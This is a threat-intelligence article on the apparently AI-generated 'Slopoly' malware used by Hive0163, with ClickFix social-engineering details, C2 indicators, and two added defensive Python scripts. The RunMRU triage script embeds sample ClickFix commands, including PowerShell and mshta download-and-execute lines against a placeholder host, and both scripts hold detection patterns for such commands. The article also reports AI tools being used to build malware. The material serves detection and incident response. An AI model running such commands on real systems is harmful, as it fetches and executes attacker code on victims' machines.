In early 2026, IBM X-Force researchers uncovered “Slopoly,” a malware strain believed to be AI-generated and used by the financially motivated threat group Hive0163. The discovery shows how quickly cybercriminals are adopting artificial intelligence to produce working attack tooling faster and at lower cost. Hive0163 focuses on large-scale data theft and ransomware deployment, relying on a custom toolkit built for persistent network access.
The Hive0163 threat group has been linked to numerous high-profile global ransomware attacks, consistently utilizing the Interlock ransomware variant. Their arsenal includes proprietary tools such as the NodeSnake backdoor, InterlockRAT, and the JunkFiction loader, all meticulously crafted to ensure prolonged access to compromised systems. Initial access to target networks is typically achieved through ClickFix attacks and malvertising campaigns, and the group is also known to engage with initial access brokers, positioning Hive0163 as a well-connected and formidable adversary in the current threat environment.
AI-Generated Malware ‘Slopoly’ Fuels Hive0163 Ransomware Attacks
IBM X-Force analysts first identified Slopoly during an active ransomware incident. The malware was discovered on an already compromised server, functioning as the client component of a bespoke command-and-control (C2) framework. It was installed in the directory C:\ProgramData\Microsoft\Windows\Runtime and established persistence through a scheduled task named “Runtime Broker.” Hive0163 used Slopoly to maintain access to the server for over a week, although the specific commands executed during this period were not recovered.
The internal structure of the Slopoly script exhibits characteristics typical of AI generation: extensive inline comments, uniform error handling, and clearly descriptive variable names, all common in code produced by large language models. Notably, the script contains an unused “Jitter” function, likely a leftover from an iterative prompt-and-revise development process. The script's own header describes it as a “Polymorphic C2 Persistence Client,” but it has no ability to modify its code at run time, so the label is inaccurate. IBM X-Force could not determine which AI model generated Slopoly, but its overall quality points to an early, unsophisticated stage of AI-assisted malware development rather than a mature one.
The broader implications of this discovery extend beyond the technical specifics of Slopoly. It underscores a significant shift in the threat landscape, demonstrating that cybercriminals no longer require extensive programming expertise to create functional malware. AI tools are now capable of handling a substantial portion of this development work. Palo Alto Networks’ Unit 42, in their 2026 Global Incident Response Report released shortly after IBM’s findings, corroborated this trend, noting similar patterns of AI adoption in ransomware campaigns and validating the growing influence of artificial intelligence across the broader threat actor community.
The ClickFix Entry Point and the Attack Chain
The intrusion began with a ClickFix attack, a social engineering technique that tricks the victim into running a malicious PowerShell command themselves. The attacker serves a fake CAPTCHA-style verification page whose script silently copies a command to the clipboard; the page then instructs the victim to press Win+R, paste, and press Enter, which runs the command under the victim's own account without any exploit and without the user understanding what they executed.
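Because every Win+R command is recorded in the user's RunMRU registry key, that key is the quickest place to confirm a ClickFix execution after the fact. The following Python triage script is an added example, not code from IBM X-Force or from the article: it reads the RunMRU values in the order Explorer's MRUList gives them, decodes any -EncodedCommand payload, and scores each entry against heuristics for the ClickFix pattern (an interpreter launched from the Run dialog, a download cradle, in-memory execution, hidden-window flags, and the "I am not a robot" style trailing comment). The sample key contents are constructed for the example; example.invalid is a placeholder host.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import Optional

# Key that Explorer updates every time a command is run from the Win+R dialog.
RUNMRU_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Constructed -EncodedCommand payload (UTF-16LE, base64) for the sample below.
_ENC_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')".encode("utf-16le")
).decode("ascii")

# Constructed RunMRU contents as value name -> data, the shape you get from
# `reg query` or a registry parser. Each slot (a, b, c, ...) holds one Run
# command terminated by a literal "\1"; MRUList orders slots most-recent-first.
# None of these commands come from the IBM report; example.invalid is a placeholder.
SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": "powershell -w hidden -c \"iex (iwr 'http://example.invalid/verify' -UseBasicParsing)\"\\1",
    "c": "mstsc\\1",
    "d": "mshta http://example.invalid/captcha.hta\\1",
    "e": f"powershell -NoP -enc {_ENC_PAYLOAD} # \"I am not a robot - reCAPTCHA Verification ID: 8431\"\\1",
    "MRUList": "ebdca",
}

# (label, weight, regex), applied case-insensitively to the command plus any decoded payload.
RULES = [
    ("interpreter launched from Run dialog", 2,
     r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|regsvr32|rundll32|certutil|curl|bitsadmin)(\.exe)?\b"),
    ("download cradle", 3,
     r"(\biwr\b|\birm\b|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|net\.webclient|https?://)"),
    ("in-memory execution", 3, r"\b(iex|invoke-expression)\b"),
    ("hidden window or policy bypass", 2,
     r"(-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass)"),
    ("encoded command", 3, r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}"),
    ("ClickFix lure text in trailing comment", 4, r"#.*(not a robot|captcha|verif)"),
]

_ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class Finding:
    slot: str
    command: str
    score: int
    reasons: list = field(default_factory=list)
    decoded: Optional[str] = None


def decode_encoded_command(command: str) -> Optional[str]:
    """Return the UTF-16LE text behind a PowerShell -EncodedCommand argument, if present."""
    m = _ENC_RE.search(command)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:  # binascii.Error is a subclass of ValueError
        return None
    return raw.decode("utf-16le", errors="ignore")


def parse_runmru(values: dict) -> list:
    """Return (slot, command) pairs most-recent-first, with the trailing '\\1' removed."""
    order = values.get("MRUList", "")
    slots = [s for s in order if s in values]
    slots += [s for s in sorted(values) if s != "MRUList" and s not in order]
    out = []
    for slot in slots:
        data = values[slot]
        if data.endswith("\\1"):
            data = data[:-2]
        out.append((slot, data))
    return out


def analyze_runmru(values: dict, threshold: int = 5) -> list:
    """Score every Run entry; entries at or above threshold are returned for investigation."""
    findings = []
    for slot, command in parse_runmru(values):
        decoded = decode_encoded_command(command)
        haystack = command + ("\n" + decoded if decoded else "")
        score, reasons = 0, []
        for label, weight, pattern in RULES:
            if re.search(pattern, haystack, re.I):
                score += weight
                reasons.append(label)
        if score >= threshold:
            findings.append(Finding(slot, command, score, reasons, decoded))
    return findings


if __name__ == "__main__":
    print(f"Reviewing {RUNMRU_KEY}")
    for f in analyze_runmru(SAMPLE_RUNMRU):
        print(f"[{f.score:>2}] slot {f.slot}: {f.command[:70]}")
        print("     " + "; ".join(f.reasons))
        if f.decoded:
            print("     decoded: " + f.decoded)
```

Ordering by MRUList matters during an incident: the most recent slot is the one that ran the ClickFix payload, and the slot letters alone are not chronological. The threshold is deliberately low so that a bare `mshta http://...` still surfaces; tune the weights to your environment rather than removing rules.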
This initial point of compromise triggered a multi-stage deployment of malicious tools. First, NodeSnake, a backdoor written in Node.js, was installed, establishing communication with a C2 server via HTTP POST requests. Following this, the more advanced InterlockRAT was deployed, introducing capabilities such as WebSocket communication, a SOCKS5 tunnel, and a reverse shell. Slopoly was introduced in the later phases of the attack, alongside other post-exploitation tools like AzCopy and Advanced IP Scanner. The C2 server associated with Slopoly was hosted on plurfestivalgalaxy[.]com (IP address 94.156.181[.]89) and displayed a login panel during its operational period.
![C2 panel displayed on plurfestivalgalaxy[.]com (Source - IBM)](https://hackernews.ae/wp-content/uploads/2026/03/C2 panel displayed on plurfestivalgalaxy[.]com (Source - IBM).webp.jpeg)
In response to these threats, security teams are advised to prioritize behavior-based detection. Because AI assistance lets an operator regenerate a working client cheaply, signatures tuned to one sample's code patterns rarely transfer to the next; detections keyed on behavior (a scheduled task launching a script from a ProgramData directory, beaconing to a newly registered domain) hold up better. IBM X-Force recommends protective measures against ClickFix, such as disabling the Win+R Run dialog or monitoring the RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) for unusual entries; note that disabling Run removes this lure's launch point but not the technique, so RunMRU review is best paired with command-line logging for PowerShell processes spawned by explorer.exe. Defenders should also sweep their environments for Hive0163 indicators, including the now-inactive Slopoly C2 domain plurfestivalgalaxy[.]com, its IP address 94.156.181[.]89, and the other identified C2 IPs 77.42.75[.]119, 23.227.203[.]123, and 172.86.68[.]64.
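The indicators above are published defanged, so a sweep has to refang them before matching, and a useful sweep matches subdomains of the C2 domain as well as the exact names. The Python below is an added example, not code from IBM X-Force or the article: it refangs the IOC list from the report, scans DNS and connection log lines for exact or subdomain matches, and separately checks a `schtasks /query /fo CSV /v` export for the two persistence artefacts described earlier (a task named “Runtime Broker” and an action referencing C:\ProgramData\Microsoft\Windows\Runtime). The log lines and task export are constructed for the example; benign entries use documentation address space, and the script file name client.ps1 is a placeholder, since the report does not name the file.

```python
import csv
import io
import re

# Network IOCs exactly as published (defanged) in the IBM X-Force report.
IOCS_DEFANGED = [
    "plurfestivalgalaxy[.]com",
    "94.156.181[.]89",
    "77.42.75[.]119",
    "23.227.203[.]123",
    "172.86.68[.]64",
]

# Persistence artefacts from the Slopoly incident, compared case-insensitively.
SUSPICIOUS_TASK_DIR = r"c:\programdata\microsoft\windows\runtime"
SUSPICIOUS_TASK_NAME = "runtime broker"

# Constructed DNS/connection log lines (not real traffic). Benign entries use
# documentation address space (203.0.113.0/24, 198.51.100.0/24).
SAMPLE_LOGS = """\
2026-03-02T10:14:03Z dns host=WS-0213 query=www.example.com answer=203.0.113.10
2026-03-02T10:15:41Z dns host=WS-0213 query=plurfestivalgalaxy.com answer=94.156.181.89
2026-03-02T10:15:42Z conn host=WS-0213 proto=tcp dst=94.156.181.89 dport=443 bytes_out=18422
2026-03-02T11:02:09Z conn host=SRV-FS01 proto=tcp dst=172.86.68.64 dport=8080 bytes_out=512
2026-03-02T11:05:30Z dns host=SRV-FS01 query=cdn.plurfestivalgalaxy.com answer=94.156.181.89
2026-03-02T11:30:55Z conn host=WS-0077 proto=tcp dst=198.51.100.7 dport=443 bytes_out=901
"""

# Constructed, abbreviated `schtasks /query /fo CSV /v` export. The file name
# client.ps1 is a placeholder; the report gives only the directory and task name.
SAMPLE_TASKS_CSV = (
    '"HostName","TaskName","Status","Author","Task To Run"\n'
    '"SRV-FS01","\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","Ready","Microsoft Corporation","%windir%\\defrag.exe -c -h -k -g -$"\n'
    '"SRV-FS01","\\Runtime Broker","Ready","SRV-FS01\\svc_backup","powershell.exe -File C:\\ProgramData\\Microsoft\\Windows\\Runtime\\client.ps1"\n'
    '"SRV-FS01","\\Microsoft\\Windows\\UpdateOrchestrator\\Schedule Scan","Ready","Microsoft Corporation","%systemroot%\\system32\\usoclient.exe StartScan"\n'
)

_TOKEN_SPLIT = re.compile(r"""[\s=,;"'()\[\]<>]+""")


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into a matchable, lower-cased form."""
    return ioc.replace("[.]", ".").replace("hxxp", "http").lower()


def _match_token(tok: str, wanted: list):
    tok = tok.lower().rstrip(".")
    for ioc in wanted:
        # Exact match for IPs and domains; suffix match so subdomains of a C2 domain also hit.
        if tok == ioc or tok.endswith("." + ioc):
            return ioc
    return None


def match_iocs(log_text: str, iocs=IOCS_DEFANGED) -> list:
    """Return one hit per log line that mentions any IOC (first IOC found wins)."""
    wanted = [refang(i) for i in iocs]
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        for tok in _TOKEN_SPLIT.split(line):
            ioc = _match_token(tok, wanted)
            if ioc:
                hits.append({"line": lineno, "ioc": ioc, "text": line})
                break
    return hits


def find_suspicious_tasks(csv_text: str) -> list:
    """Flag scheduled tasks matching the Slopoly persistence name or install directory."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        leaf = row["TaskName"].rsplit("\\", 1)[-1].strip().lower()
        action = row["Task To Run"].lower()
        reasons = []
        if leaf == SUSPICIOUS_TASK_NAME:
            reasons.append("task name matches the Slopoly persistence task")
        if SUSPICIOUS_TASK_DIR in action:
            reasons.append("action references the Slopoly install directory")
        if reasons:
            hits.append({"task": row["TaskName"], "action": row["Task To Run"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for h in match_iocs(SAMPLE_LOGS):
        print(f"line {h['line']}: {h['ioc']} <- {h['text']}")
    for t in find_suspicious_tasks(SAMPLE_TASKS_CSV):
        print(f"task {t['task']!r}: {'; '.join(t['reasons'])}")
```

Token-based matching avoids the classic substring mistake where 94.156.181.8 would match 94.156.181.89, while the suffix rule still catches a subdomain such as cdn.plurfestivalgalaxy.com. Since the domain is now inactive, historical DNS and proxy logs are where these matches will appear, so run the sweep over retained logs rather than only live traffic.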

